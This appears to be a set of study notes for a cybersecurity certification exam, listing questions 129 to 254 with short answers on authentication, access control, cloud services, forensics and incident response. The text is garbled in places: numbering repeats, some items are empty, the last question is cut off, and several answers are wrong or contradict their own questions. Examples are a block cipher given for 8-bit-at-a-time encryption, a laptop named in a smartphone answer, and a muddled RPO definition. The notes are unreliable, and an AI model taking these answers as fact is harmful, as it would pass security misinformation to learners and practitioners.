129. Which analysis framework provides a graphical depiction of the attacker's approach relative to a kill
chain?
The Diamond Model provides an excellent methodology for communicating cyber events and allowing
analysts to derive mitigation strategies implicitly. The Diamond Model is constructed around a graphical
representation of an attacker's behavior. The MITRE ATT&CK framework provides explicit pseudo-code
examples for detecting or mitigating a given threat within a network and ties specific behaviors back to
individual actors. The Lockheed Martin cyber kill chain provides a general life cycle description of how
attacks occur but does not deal with the specifics of how to mitigate them. OpenIOC contains a depth of
research on APTs but does not integrate the detection and mitigation strategy.
130. Which protocol relies on mutual authentication of the client and the server for its security?
The Lightweight Directory Access Protocol (LDAP) uses a client-server model for mutual authentication.
LDAP is used to enable access to a directory of resources (workstations, users, information, etc.). TLS
provides mutual authentication between clients and servers. Since Secure LDAP (LDAPS) uses TLS, it
provides mutual authentication.
131. You have been hired as a cybersecurity analyst for a privately-owned bank. Which of the following
regulations would have the greatest impact on your bank's cybersecurity program?
The Gramm-Leach-Bliley Act (GLBA) is a United States federal law that requires financial institutions to
explain how they share and protect their customers’ private information.
132. Which of the following techniques would be the most appropriate solution to implementing a
multi-factor authentication system?
Smartcard and PIN
133. Your company just launched a new invoicing website for use by your five largest vendors. You are
the cybersecurity analyst and have been receiving numerous phone calls that the webpage is timing out,
and the website overall is performing slowly. You have noticed that the website received three million
requests in just 24 hours, and the service has now become unavailable for use. What do you
recommend should be implemented to restore and maintain the availability of the new invoicing
system?
By implementing an allow list of the authorized IP addresses for the five largest vendors, they will be the
only ones who can access the webserver. This can be done by creating rules in the Access Control List
(ACL) to deny ALL other users except these five vendors, thereby dropping a large number of requests
from any other IP addresses, such as those from an attacker.
134. Why would a company want to utilize a wildcard certificate for their servers?
A wildcard certificate is a public key certificate that can be used with multiple subdomains of a domain.
This saves money and reduces the management burden of managing multiple certificates, one for each
subdomain. A single wildcard certificate for *.diontraining.com will secure all these domains
(www.diontraining.com, mail.diontraining.com, ftp.diontraining.com, etc.).
134. You suspect that your server has been the victim of a web-based attack. Which of the following
ports would most likely be seen in the logs to indicate the attack's target?
Web-based attacks would likely appear on port 80 (HTTP) or port 443 (HTTPS). An attack against Active
Directory is likely to be observed on port 389 LDAP. An attack on an FTP server is likely to be observed
on port 21 (FTP). An attack using the remote desktop protocol would be observed on port 3389 (RDP).
135. You are trying to select the best device to install to proactively stop outside attackers from reaching
your internal network. Which of the following devices would be the BEST for you to select?
An intrusion prevention system (IPS) is a form of network security that detects and prevents identified
threats. Intrusion prevention systems continuously monitor your network, looking for possible malicious
incidents and capturing information about them. An IPS can block malicious network traffic.
136. Which of the following categories would contain information about a French citizen's race or ethnic
origin?
According to the GDPR, information about an individual's race or ethnic origin is classified as Sensitive
Personal Information (SPI). Sensitive personal information (SPI) is information about a subject's
opinions, beliefs, and nature afforded specially protected status by privacy legislation.
137. Which of the following types of data breaches would require that the US Department of Health and
Human Services and the media be notified if more than 500 individuals are affected by a data breach?
Protected health information (PHI) is defined as any information that identifies someone as the subject
of medical and insurance records, plus their associated hospital and laboratory test results.
138. A cybersecurity analyst has deployed a custom DLP signature to alert on any files that contain
numbers in the format of a social security number (xxx-xx-xxxx). Which of the following concepts within
DLP is being utilized?
An exact data match (EDM) is a pattern matching technique that uses a structured database of string
values to detect matches.
139. Windows file servers commonly hold sensitive files, databases, passwords, and more. What
common vulnerability is usually used against a Windows file server to expose sensitive files, databases,
and passwords?
Missing patches are the most common vulnerability found on both Windows and Linux systems. When a
security patch is released, attackers begin to reverse engineer the security patch to exploit the
vulnerability. If your servers are not patched against the vulnerability, they can become victims of the
exploit, and the server's data can become compromised.
140. Your company is making a significant investment in infrastructure-as-a-service (IaaS) hosting to
replace its data centers. Which of the following techniques should be used to mitigate the risk of data
remanence when moving virtual hosts from one server to another in the cloud?
To mitigate the risk of data remanence, you should implement full disk encryption. This method will
ensure that all data is encrypted and cannot be exposed to other organizations or the underlying IaaS
provider.
141. Select four security features that you should use to best protect your servers in the data center.
These can include physical, logical, or administrative protections.
The best option based on your choices is FM-200, Biometric locks, Mantrap, and Antivirus.
142. A supplier needs to connect several laptops to an organization’s network as part of their service
agreement. These laptops will be operated and maintained by the supplier. Victor, a cybersecurity
analyst for the organization, is concerned that these laptops could contain some vulnerabilities that
could weaken the network's security posture. What can Victor do to mitigate the risk to other devices on
the network without having direct administrative access to the supplier’s laptops?
A jump box is a system on a network used to access and manage devices in a separate security zone. This
would create network segmentation between the supplier's laptops and the rest of the network to
minimize the risk. A jump box is a hardened and monitored device that spans two dissimilar
security zones and provides a controlled means of access between them.
143. Which of the following types of access control provides the strongest level of protection?
Mandatory Access Control (MAC) requires all access to be predefined based on system classification,
configuration, and authentication. MAC is commonly used in highly centralized environments and
usually relies on a series of labels, such as classification levels of the data.
144. Which type of method is used to collect information during passive reconnaissance?
Reviewing public repositories. Passive reconnaissance focuses on collecting information that is widely
and openly available from publicly available sources.
145. What is key escrow?
Key escrow is used for third-party access and custody of a private key. Key escrow occurs when a CA or
another entity, such as a third party, maintains a copy of the private key associated with the public key
signed by the CA. This allows the CA or escrow agent to have access to all information encrypted using
the public key from a user’s certificate and to create digital signatures on behalf of the user.
146. Frank and John have started a secret club together. They want to ensure that when they send
messages to each other, they are truly unbreakable. What encryption key would provide the
STRONGEST and MOST secure encryption?
Randomized one-time use pad
147. You are creating a script to filter some logs so that you can detect any suspected malware
beaconing. Which of the following is NOT a typical means of identifying a malware beacon's behavior on
the network?
The beacon's protocol is not typically a means of identifying a malware beacon.
148. Which operating system feature is designed to detect malware that is loaded early in the system
startup process or before the operating system can load itself?
Measured boot is a feature where a log of all boot actions is taken and stored in a trusted platform
module for later retrieval and analysis by anti-malware software on a remote server.
149. You have recently been hired as a security analyst at Dion Training. On your first day, your
supervisor begins to explain the way their network is configured, showing you the physical and logical
placement of each firewall, IDS sensor, host-based IPS installations, the networked spam filter, and the
DMZ. What best describes how these various devices are placed into the network for the highest level of
security?
Defense in depth is the concept of layering various network appliances and configurations to create a
more secure and defensible architecture.
150. You are in the recovery steps of an incident response. Throughout the incident, your team never
successfully determined the root cause of the network compromise. Which of the following options
would you LEAST likely perform as part of your recovery and remediation actions?
The only option that is not considered a hardening action is to proactively sanitize and reimage your
routers and switches. If you performed this action, you could have unwanted disruptive effects on the
company.
151. Which term is used in software development to refer to the method in which app and platform
updates are committed to a production environment rapidly?
Continuous deployment is a software development method in which app and platform updates are
committed to production rapidly.
152. During your annual cybersecurity awareness training in your company, the instructor states that
employees should be careful as to what information they post on social media. According to the
instructor, if you post too much personal information on social media, such as your name, birthday,
hometown, and other personal details, it is much easier for an attacker to conduct which type of attack
in order to break your passwords?
A cognitive password is a form of knowledge-based authentication that requires a user to answer a
question, presumably something they intrinsically know, to verify their identity. If you post a lot of
personal information about yourself online, then this type of password can easily be bypassed.
153. Which of the following technologies is NOT a shared authentication protocol?
LDAP can be used for single sign-on but is not a shared authentication protocol.
154. You are working as part of the server team for an online retail store. Due to the upcoming holidays,
your boss is worried that the current servers may not be able to handle the increased demand during a
big sale. Which of the following cloud computing concepts can quickly allow services to scale upward
during busy periods and scale down during slower periods based on the changing user demand?
In cloud computing, the term rapid elasticity is used to describe the scalable provisioning or the
capability to provide scalable cloud computing services. Rapid elasticity is very critical to meet the
fluctuating demands of cloud users. The downside of rapid elasticity implementations is that they can
put a significant load on the system due to the high number of resource allocation and deallocation
requests.
155. You are working as part of a cyber incident response team. An ongoing attack has been identified
on your webserver. Your company wants to take legal action against the criminals who have hacked
your server, so they have brought in a forensic analyst from the FBI to collect the evidence from the
server. What order should the digital evidence be collected based on the order of volatility?
The correct order for evidence collection based on the order of volatility is the Processor Cache,
Random Access Memory, Swap File, and then the Hard Drive or USB Drive.
156. Which of the following is the most important feature to consider when designing a system on a
chip?
Savings of space and power are the most important features to consider when designing a system on a
chip.
157. You want to create a new mobile application and develop it in the cloud. You just signed up for a
cloud-based service provider's offering to allow you to develop it using their programming environment.
Which of the following best describes which type of service you have just purchased?
Platform as a Service (PaaS) provides the end-user with a development environment without all the
hassle of configuring and installing it themselves. If you want to develop a customized or specialized
program, PaaS helps reduce the development time and overall costs by providing a ready-to-use
platform.
158. You are conducting an incident response and have traced the source of the attack to some
compromised user credentials. After performing log analysis, you discover that the attack was
successfully authenticated from an unauthorized foreign country. Your management is now asking for
you to implement a solution to help mitigate this type of attack from occurring again. Which of the
following should you implement?
Context-based authentication can take a number of factors into consideration before permitting access
to a user, including their location (e.g., country, GPS location, etc.), the time of day, and other key
factors to minimize the threat of compromised credentials from being utilized by an attacker.
159. During which incident response phase is the preservation of evidence performed?
A cybersecurity analyst must preserve evidence during the containment, eradication, and recovery
phase.
160. Which of the following does a User Agent request a resource from when conducting a SAML
transaction?
SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a
service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the identity
of a user (the principal) can be trusted by the SP without the user having to authenticate directly with
the SP.
161. Which of the following authentication mechanisms involves receiving a one-time use shared secret
password, usually through a token-based key fob or smartphone app, that does not expire?
HOTP
162. A username and password is used as part of the Password Authentication Protocol (PAP)
authentication system.
163. A cybersecurity analyst from BigCorp contacts your company to notify them that several of your
computers were seen attempting to create a denial of service condition against their servers. They
believe your company has become infected with malware, and those machines were part of a larger
botnet. Which of the following BEST describes your company's infected computers?
A zombie is a computer connected to the internet that has been compromised by a hacker, computer
virus or trojan horse program and can be used to perform malicious tasks of one sort or another under
remote direction. Botnets of zombie computers are often used to spread email spam and launch denial-of-service attacks (DoS attacks).
164. Upon further investigation, you determine that these devices are PLCs used to control the
hospital's elevators. Unfortunately, there is not an update available from the elevator manufacturer for
these devices. Which of the following mitigations do you recommend?
The best recommendation is to conduct the logical or physical isolation of the elevator control system
from the rest of the production network and the internet. This should be done through the change
control process.
165. Which of the following access control methods provides the most detailed and explicit type of
access control over a resource?
Attribute-based access control (ABAC) provides the most detailed and explicit type of access control
over a resource because it is capable of making access decisions based on a combination of subject and
object attributes, as well as context-sensitive or system-wide attributes.
166. Using the image provided, select four security features that you should use with a smart phone
provided through a COPE policy in your organization?
Cellular data, Remote wipe, Location tracking, and MDM are all appropriate security features to use
with a company-provided laptop.
167. You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to
begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the
following evidence should you capture first?
You should always begin the collection with the CPU registers and cache memory (L1/L2/L3/GPU),
followed by the contents of system memory (RAM), including the routing table, ARP cache, process tables,
kernel statistics, and temporary file systems/swap space/virtual memory.
168. A macOS user is browsing the internet in Google Chrome when they see a notification that says
"Windows Enterprise Defender: Your computer is infected with a virus, please click here to remove it!"
What type of threat is this user experiencing?
Rogue anti-virus is a form of malicious software and internet fraud that misleads users into believing
there is a virus on their computer, and to pay money for a fake malware removal tool (that actually
introduces malware to the computer).
169. You are conducting an incident response and want to determine if any account-based indicators of
compromise (IoC) exist on a compromised server. Which of the following would you NOT search for on
the server?
A malicious process is one that is running on a system and is outside the norm. This is a host-based
indicator of compromise (IOC) and is not directly associated with an account-based IOC.
170. Your organization requires the use of TLS or IPSec for all communications with an organization's
network. Which of the following is this an example of?
Data in transit (or data in motion) occurs whenever data is transmitted over a network.
171. Which of the following is NOT considered part of the Internet of Things?
Laptops.
172. A company needs to implement stronger authentication by adding an authentication factor to its
wireless system. The wireless system only supports WPA with pre-shared keys, but the backend
authentication system supports EAP and TTLS. What should the network administrator implement?
Since the backend uses a RADIUS server for back-end authentication, the network administrator can
install 802.1x using EAP with MSCHAPv2 for authentication.
173. You just received a notification that your company's email servers have been blacklisted due to
reports of spam originating from your domain. What information do you need to start investigating the
source of the spam emails?
You should first request a copy of one of the spam messages that include the full email header.
174. Which of the following is NOT a means of improving data validation and trust?
Decrypting data at rest does not improve data validation or trust since the data at rest could be
modified when decrypted.
175. Which protocol is paired with OAuth2 to provide authentication of users in a federated identity
management solution?
Open ID Connect (OIDC) is an authentication protocol that can be implemented as special types of
OAuth flows with precisely defined token fields.
176. Vulnerability scans must be conducted on a continuous basis in order to meet regulatory
compliance requirements for the storage of PHI. During the last vulnerability scan, a cybersecurity
analyst received a report of 2,592 possible vulnerabilities and was asked by the Chief Information
Security Officer (CISO) for a plan to remediate all the known issues. Which of the following should the
analyst do next?
Filter the scan results to include only those items listed as critical in the asset inventory and remediate
those vulnerabilities first.
177. You are trying to find a rogue device on your wired network. Which of the following options would
NOT be helpful in finding the device?
War walking is conducted by walking around a building while trying to locate wireless networks and
devices. War walking will not help find a wired rogue device. Checking valid MAC addresses against a
known list, scanning for new systems or devices, and physically surveying for unexpected systems can be
used to find rogue devices on a wired network.
178. Which of the following tools could be used to detect unexpected output from an application being
managed or monitored?
A behavior-based analysis tool can be used to capture/analyze normal behavior and then alert when an
anomaly occurs. Configuring a behavior-based analysis tool requires more effort to properly set up, but
it requires less work and manual monitoring once it is running.
179. Janet, a defense contractor for the military, is performing an analysis of their enterprise network to
identify what type of work the Army would be unable to perform if the network were down for more
than a few days. Which of the following was Janet trying to identify?
Mission essential functions are things that must be performed by an organization to meet their mission.
For example, the Army being able to deploy its soldiers is a mission essential function. If they couldn't do
that because of a network server being offline, then that system would be considered a critical system
and should be prioritized for higher security and better defenses.
180. Which of the following access control methods utilizes a set of organizational roles in which users
are assigned to gain permissions and access rights?
RBAC
181. When conducting forensic analysis of a hard drive, what tool would BEST prevent changing the
contents of the hard drive during your analysis?
The primary purpose of a hardware write blocker is to intercept and prevent (or 'block') any modifying
command operation from ever reaching the storage device.
182. What kind of attack is an example of IP spoofing?
The man-in-the-middle attack intercepts communications between two systems.
183. You are configuring the ACL for the network perimeter firewall. You have just finished adding all the
proper allow and deny rules. What should you place at the end of your ACL rules?
Include an implicit deny at the end of your ACL rules.
184. The digital certificate on the Dion Training web server is about to expire. Which of the following
should Jason submit to the CA in order to renew the server's certificate?
A CSR (certificate signing request) is what is submitted to the CA (certificate authority) to request a
digital certificate.
185. You have been asked to separate the corporate network into an administrative network (for
corporate-owned devices) and an untrusted network (for employee-owned devices). Which of the
following technologies should you implement to achieve this goal?
VLAN is a type of network segmentation that is configured in your network switches and that prevents
communications between different VLANs without using a router.
186. Which of the following IP addresses in the firewall logs would indicate a connection attempt from
an external source?
192.186.1.100, since it is not a private IP address.
187. https://test.diontraining.com/profile.php?userid=1546
https://test.diontraining.com/profile.php?userid=5482
https://test.diontraining.com/profile.php?userid=3618
What type of vulnerability does this website have?
Insecure direct object references (IDOR) are a cybersecurity issue that occurs when a web application
developer uses an identifier for direct access to an internal implementation object but provides no
additional access control and/or authorization checks. In this scenario, an attacker could simply change
the userid number and directly access any user's profile page.
188. A cybersecurity analyst has received an alert that well-known call home messages are continuously
observed by sensors at their network boundary, but the organization's proxy firewall is properly
configured to successfully drop the messages prior to them leaving the network. Which of the following
is MOST likely the cause of the call home messages being sent?
An infected workstation is attempting to reach a command and control server.
189. A cybersecurity analyst is working for a university that is conducting a big data medical research
project. The analyst is concerned about the possibility of an inadvertent release of PHI data. Which of
the following strategies should be used to prevent this?
The university should utilize a tokenization approach to prevent an inadvertent release of the PHI data.
190. A hardware security token like the one displayed creates a one-time use password by presenting
the user with a random string of numbers that changes every 30-60 seconds. When used by itself, it is
considered a one-time password authentication method.
191. Which of the following elements is LEAST likely to be included in an organization's data retention
policy?
Data classification would not be covered in the retention policy.
192. Your company wants to provide a secure SSO solution for accessing both the corporate wireless
network and its network resources. Which of the following technologies should be used?
With RADIUS and SSO configured, users on the network can provide their user credentials one time
(when they initially connect to the wireless access point or another RADIUS client), and they are
automatically authenticated to all of the network's resources.
193. Jason has installed multiple virtual machines on a single physical server. He needs to ensure that
the traffic is logically separated between each virtual machine. How can Jason best implement this
requirement?
Configure a virtual switch on the physical server and create VLANs.
194. Which of the following describes the overall accuracy of a biometric authentication system?
The Crossover Error Rate describes the overall accuracy of a biometric system.
195. A web developer wants to protect their new web application from a man-in-the-middle attack.
Which of the following controls would best prevent an attacker from stealing tokens stored in cookies?
Setting the secure attribute on the cookie.
196. A company's NetFlow collection system can handle up to 2 Gbps. Due to excessive load, this has
begun to approach full utilization at various times of the day. If the security team does not have
additional money in their budget to purchase a more capable collector, which of the following options
could they use to collect useful data?
Enable sampling of the data collected.
197. A software assurance laboratory is performing a dynamic assessment on an application by
automatically generating random data sets and inputting them in an attempt to cause an error or failure
condition. Which of the following is the laboratory performing?
Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid,
unexpected, or random data as inputs to a computer program.
198. You were conducting a forensic analysis of an iPad backup and discovered that only some of the
information is contained within the backup file. Which of the following best explains why some of the
data is missing?
iPhone/iPad backups can be created as full or differential backups.
199. You are working as a security administrator and need to respond to an ongoing spearphishing
campaign against your organization. Which of the following should be used as a checklist of actions to
perform in order to detect and respond to this particular incident?
Playbook.
200. Ryan needs to verify the installation of a critical Windows patch on his organization's workstations.
Which method would be the most efficient to validate the current patch status for all of the
organization's Windows 10 workstations?
SCCM.
201. Christina is auditing the security procedures related to the use of a cloud-based online payment
service. She notices that the access permissions are set so that a single person can not add funds to the
account and transfer funds out of the account. What security principle is most closely related to this
scenario?
Separation of duties is the concept of having more than one person required to complete a task.
202. A new smartphone supports the ability for users to transfer a photograph by simply placing their
phones near each other and "tapping" the two phones together. What type of technology does this
most likely rely on?
NFC, or near-field communication, is a set of communication protocols that enable two electronic
devices
203. Which authentication mechanism does 802.1x usually rely upon?
Extensible Authentication Protocol (EAP)
204. You have been asked to determine if Dion Training’s webserver is vulnerable to a recently
discovered attack on an older version of SSH. Which technique should you use to determine the current
version of SSH running on their web server?
Banner grabbing is conducted by actively connecting to the server using telnet or netcat and collecting
the response from the webserver. This banner usually contains the operating system being run by the
server as well as the version number of the service (SSH) being run.
205. Which of the following authentication protocols was developed by Cisco to provide authentication,
authorization, and accounting services?
TACACS+ is an extension to TACACS (Terminal Access Controller Access Control System) and was
developed as a proprietary protocol by Cisco.
206. A corporate workstation was recently infected with malware. The malware was able to access the
workstation's credential store and steal all the usernames and passwords from the machine. Then, the
malware began to infect other workstations on the network using the usernames and passwords it stole
from the first workstation. The IT Director has directed its IT staff to come up with a plan to prevent this
type of issue from occurring again in the future. Which of the following would BEST prevent this from
reoccurring?
The only solution provided that could STOP this from reoccurring would be to use an anti-virus or anti-malware solution with heuristic analysis.
207. On his way home, he forgot the laptop in an Uber, and a few days later, the data was posted on the
internet. Which of the following mitigations would have provided the greatest protection against this
data breach?
Require data-at-rest encryption on all endpoints.
208. Which role validates the user’s identity when using SAML for authentication?
The IdP provides the validation of the user's identity.
209. You have been asked to recommend a capability to monitor all of the traffic entering and leaving
the corporate network's default gateway. Additionally, the company's CIO requests the ability to block
certain types of content before it leaves the network based on operational priorities. Which of the
following solutions should you recommend to meet these requirements?
Due to the requirements provided, you should install a NIPS on the internal interface of the gateway
router and a firewall on the external interface of the gateway router. The firewall on the external
interface will allow the bulk of the malicious inbound traffic to be filtered prior to reaching the network.
Then, the NIPS can be used to conduct an inspection of the traffic entering the network and provide
protection for the network using signature-based or behavior-based analysis.
210. Syed is developing a vulnerability scanner program for a large network of sensors that are used to
monitor his company's transcontinental oil pipeline. What type of network is this?
SCADA
211. In 2014, Apple's implementation of SSL had a severe vulnerability that, when exploited, allowed an
attacker to gain a privileged network position that would allow them to capture or modify data in an
SSL/TLS session. This was caused by poor programming in which a failed check of the connection would
exit the function too early. Based on this description, what is this an example of?
This is an example of an improper error handling vulnerability.
212. What technology is NOT PKI X.509 compliant and cannot be used in a variety of secure functions?
Blowfish. AES, PKCS, and SSL/TLS are all compatible with X.509 and can be used in a wide variety of
functions and purposes. AES is used for symmetric encryption. PKCS is used as a digital signature
algorithm. SSL/TLS is used for the secure key exchange.
213. Users connecting to an SSID appear to be unable to authenticate to the captive portal. Which of the
following is the MOST likely cause of the issue?
Captive portals usually rely on 802.1x, and 802.1x uses RADIUS for authentication.
214. Tim, a help desk technician, receives a call from a frantic executive who states that their company-issued smartphone was stolen during their lunch meeting with a rival company’s executive. Tim quickly
checks the MDM administration tool and identifies that the user’s smartphone is still communicating
with the MDM and displays the location of the device on a map. What should Tim do next to ensure the
data on the stolen device remains confidential and inaccessible to the thief?
Perform a remote wipe of the device from the MDM.
215. A smurf attack occurs when an attacker sends a ping to a subnet broadcast address and devices
reply to spoofed IP (victim server), using up bandwidth and processing power.
216. Dion Training has contracted a software development firm to create a bulk file upload utility for its
website. During a requirements planning meeting, the developers asked what type of encryption is
required for the project. After some discussion, Jason decides that the file upload tool should use a
cipher that is capable of encrypting 8 bits of data at a time before transmitting the files from the web
developer’s workstation to the webserver. What of the following should be selected to meet this
security requirement?
A block cipher is used to encrypt multiple bits at a time prior to moving to the next set of data. Block
ciphers generally have a fixed-length block (8-bit, 16-bit, 32-bit, 64-bit, etc.). Stream ciphers encrypt a
single bit at a time during its encryption process.
217. Which of the following identity and access management controls relies upon using a certificate-based authentication mechanism?
Smart cards, PIV, and CAC devices are used as an identity and access management control. These
devices contain a digital certificate embedded within the smart card (PIV/CAC) that is presented to the
system when it is inserted into the smart card reader. When combined with a PIN, the smart card can be
used as a multi-factor authentication mechanism. The PIN unlocks the card and allows the digital
certificate to be presented to the system.
218. You have been asked to assist with an investigation into a malicious user's activities. Unfortunately,
your organization did not have full packet capture available for the time period of the suspected
activities. Instead, you have received netflow data that contains statistics and information about the
network traffic during that time period. Which of the following best represents the type of data you can
obtain from this netflow data to support the investigation?
Netflow is a flow analysis tool. Netflow does not capture the full packet capture of data as it crosses the
network sensor but instead captures metadata and statistics about the network traffic.
219. During your review of the firewall logs, you notice that an IP address from within your company’s
server subnet had been transmitting between 125 to 375 megabytes of data to a foreign IP address
overnight each day. You have determined this has been occurring for approximately 5 days, and the
affected server has since been taken offline for forensic review. Which of the following is MOST likely to
increase the impact assessment of the incident?
PII of company employees and customers was exfiltrated.
220. Which of the following security controls provides Windows system administrators with an efficient
way to deploy system configuration settings across a large number of devices?
GPO - Group Policy Object
221. Which of the following vulnerabilities is the greatest threat to data confidentiality?
An SQL injection could allow an attacker to retrieve our data from the backend database directly. Using
this technique, the attacker could also alter the data and put it back, and nobody would notice
everything that had been changed, thereby also affecting our data integrity.
222. Jack is assessing the likelihood of reconnaissance activities being performed against his
organization. Which of the following would best classify the likelihood of a port scan being conducted
against his DMZ?
Since Jack's DMZ would contain systems and servers that are exposed to the internet, there is a high
likelihood that they are constantly being scanned by potential attackers performing reconnaissance.
223. You conducted a security scan and found that port 389 is being used when connecting to LDAP for
user authentication instead of port 636. The security scanning software recommends that you
remediate this by changing user authentication to port 636 wherever technically possible. What
should you do?
You should change all devices and servers that can technically support the change to port 636, since
LDAP services over port 636 are encrypted by default.
224. You have been hired as a consultant to help Dion Training develop a new disaster recovery plan.
Dion Training has recently grown in the number of employees and information systems infrastructure
used to support its employees. Unfortunately, Dion Training does not currently have any
documentation, policies, or procedures for its student and faculty networks. What is the first action you
should take to assist them in developing a disaster recovery plan?
The first step to developing an effective disaster recovery plan is to identify the assets. It is imperative
that the organization understands exactly what assets they own and operate.
225. Dion Training has implemented a new mandatory vacation policy to help identify any malicious
insiders or employees. Which of the following control types would this policy be categorized?
Managerial or administrative controls are used to determine the way people act. These include policies,
procedures, and guidance. Mandatory vacation policies, job rotation policies, and separation of duties
policies are great examples of managerial controls.
226. What term describes the amount of risk an organization is willing to accept?
Risk appetite
227. A hacker successfully modified the sale price of items purchased through your company's web site.
During the investigation that followed, the security analyst has verified the web server, and the Oracle
database was not compromised directly. The analyst also found no attacks that could have caused this
during their log verification of the Intrusion Detection System (IDS). What is the most likely method that
the attacker used to change the sale price of the items purchased?
Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker
changed hidden form values to change the price of the items in the shopping cart.
228.
229. Your email client has been acting strangely recently. Every time you open an email with an image
embedded within them, the image is not displayed to your screen. Which of the following is the MOST
likely cause of this issue?
This is a security setting in the mail client itself.
230. A new corporate policy dictates that all access to network resources will be controlled based on the
user's job functions and tasks within the organization. For example, only people working in Human
Resources can access employee records, and only the people working in finance can access customer
payment histories. Which of the following security concepts is BEST described by this new policy?
Least privilege is the concept and practice of restricting access rights for users, accounts, and computing
processes to only those resources absolutely required to perform routine, legitimate activities.
231. The organization's vulnerability management team has rescanned the network and identified all the
machines missing this critical patch. These systems were then patched, and the network rescanned to
verify the patch was installed properly. Which of the following types of controls would you classify the
installation of this patch as?
A corrective control is one that responds to and fixes an incident.
232. You are conducting an intensive vulnerability scan to detect which ports might be open to
exploitation. During the scan, one of the network services becomes disabled and causes an impact on
the production server. Which of the following sources of information would provide you with the most
relevant information for you to use in determining which network service was interrupted and why?
The syslog server is a centralized log management solution.
233. Which of the following terms is used to describe the period of the time taken to correct a fault so
that the system is restored to full operations after a failure or incident?
Mean time to repair (MTTR) is a measure of the time taken to correct a fault so that the system is
restored to full operation. MTTR is often used to describe the average time to replace or recover a
system or product.
234. select four security features that you should use with a workstation or laptop within your
organization?
Host-based firewall, network sniffer, cable lock, and CAT5e STP.
235. Which of the following features is supported by Kerberos, but not by RADIUS and Diameter?
Kerberos uses a system of tickets to allow nodes to communicate over a non-secure network and prove
their identity in a secure manner.
236. Your home network is configured with a long, strong, and complex pre-shared key for its WPA2
encryption. You noticed that your wireless network has been running slow, so you checked the list of
"connected clients" and see that "Bob's Laptop" is connected to it. Bob lives downstairs and is the
maintenance man for your apartment building. You know that you never gave Bob your password, but
somehow he has figured out how to connect to your wireless network. Which of the following actions
should you take to prevent anyone from connecting to your wireless network without the WPA2
password?
WPS should be disabled on all wireless networks.
237. Which of the following access control models is the most flexible and allows the owner of the
resource to control the access permissions?
Discretionary access control (DAC) stresses the importance of the owner. The original creator of the
resource is considered the owner and can then assign permissions and ownership to others.
238. Dion Training wants to implement a technology within their corporate network to BEST mitigate
the risk that a zero-day virus might infect their workstations. Which of the following should be
implemented FIRST?
Application whitelisting will only allow a program to execute if it is specifically listed in the approved
exception list. All other programs are blocked from running.
239.
240. Dion Training has performed an assessment as part of their disaster recovery planning. The
assessment found that the organization can only tolerate a maximum of 60 minutes worth of data loss
in the event of a disaster. Therefore, the organization has implemented a system of database snapshots
that are backed up every hour. Which of the following metrics would best represent this time period?
Recovery point objective (RPO) describes a period of time in which an enterprise's operations must be
restored following a disruptive event, e.g., a cyberattack, natural disaster or communications failure.
RPO is about how much data you can afford to lose before it impacts business operations.
241. Which cloud computing concept is BEST described as focusing on the replacement of applications
and programs on a customer's workstation with cloud-based resources?
Software as a Service (SaaS) is used to provide web applications to end-users.
242. You are conducting a routine vulnerability scan of a server when you find a vulnerability. You locate
a patch for the vulnerability on the software vendor's website. What should you do next?
A Request for Change should be submitted.
243. Which of the protocols listed is NOT likely to be a trigger for a vulnerability scan alert when it is
used to support a virtual private network (VPN)?
IPSec is the most secure protocol that works with VPNs. The use of PPTP and SSL is discouraged for VPN
security. Due to this, the use of PPTP and SSL for a VPN will likely alert during a vulnerability scan as an
issue to be remediated.
244. The analyst wants to remove any false positives before they begin to remediate the findings. Which
of the following is an indicator that something in their results would be a false positive?
Items classified by the system as Low or as For Informational Purposes Only
245. You are conducting an investigation on a suspected compromise. You have noticed several files that
you don't recognize. How can you quickly and effectively check if the files have been infected with
malware?
Submit the files to an open-source intelligence provider like VirusTotal
246. An organization is conducting a cybersecurity training exercise. Which team is Jason assigned if he
has been asked to monitor and manage the technical environment that is being used by the defenders
and attackers during the exercise?
White team.
247. Which of the following categories of controls are firewalls, intrusion detection systems, and a
RADIUS server classified as?
Technical controls.
248. Taylor needs to sanitize hard drives from some leased workstations that are being returned to a
supplier at the end of the lease period. The workstations' hard drives contained sensitive corporate
data. Which is the most appropriate choice to ensure that data exposure doesn’t occur during this
process?
Purging the drives, validating that the purge was effective, and documenting the sanitization
249. What is the lowest layer (bottom layer) of a bare-metal virtualization environment?
The bottom layer is physical hardware in this environment. It is what sits beneath the hypervisor and
controls access to guest operating systems. The bare-metal approach doesn’t have a host operating
system.
250. You want to play computer-based video games from anywhere in the world using your laptop or
tablet. You heard about a new product called a Shadow PC that is a virtualized Windows 10 Home
gaming PC in the cloud. Which of the following best describes this type of service?
Desktop as a Service (DaaS) provides a full virtualized desktop environment from within a cloud-based
service.
251. You are installing Windows 2016 on a rack-mounted server and want to host multiple virtual
machines within the physical server. You just finished the installation and now want to begin creating
and provisioning the virtual machines. Which of the following should you utilize to allow you to create
and provision the virtual machines?
A hypervisor, also known as a virtual machine monitor, is a process that creates and runs virtual
machines (VMs). A hypervisor allows one host computer to support multiple guest VMs by virtually
sharing its resources, like memory and processing.
252. DeepScan supports data-flow analysis and understands the execution flow of a program. It allows
you to see possible security flaws without executing the code. Which of the following types of tools
would DeepScan be classified as?
DeepScan is an example of a static code analysis tool. It inspects the code for possible errors and issues
without actually running the code. Fuzzing is an automated software testing technique that involves
providing invalid, unexpected, or random data as inputs to a computer program through the use of a
fuzzer. A decompiler is a computer program that takes an executable file as input and attempts to create
a high-level source file that can be recompiled successfully. Fault injection is a testing technique that
aids in understanding how a system behaves when stressed in unusual ways. A fuzzer, decompiler, and
fault injector are all dynamic analysis tools because they require the program being tested to be run in
order to be analyzed.
253. A client sends its authentication details to a key distribution center. What authentication protocol is
being implemented?
With Kerberos authentication, a client sends its authentication details not to the target server but to a
key distribution center (KDC). RADIUS is incorrect: the Remote Authentication Dial-In User Service (RADIUS)
remote access control system provides authentication and access control in an enterprise network,
using UDP transport, to a central network access server. TACACS is incorrect because Terminal Access
Controller Access Control System Plus (TACACS+) takes a client/server model approach. It is similar to
RADIUS but uses TCP as a transport method; it uses port 49 as the default port. EAP-TLS is incorrect
because EAP-Transport Layer Security (EAP-TLS) uses certificate-based mutual authentication,
negotiation of the encryption method, and encrypted key determination between the client and the
authenticating server.
254. Cloud providers offer security groups, which are essentially virtual firewalls that authorize traffic to
and from the compute resources. Which statement is false regarding security groups?
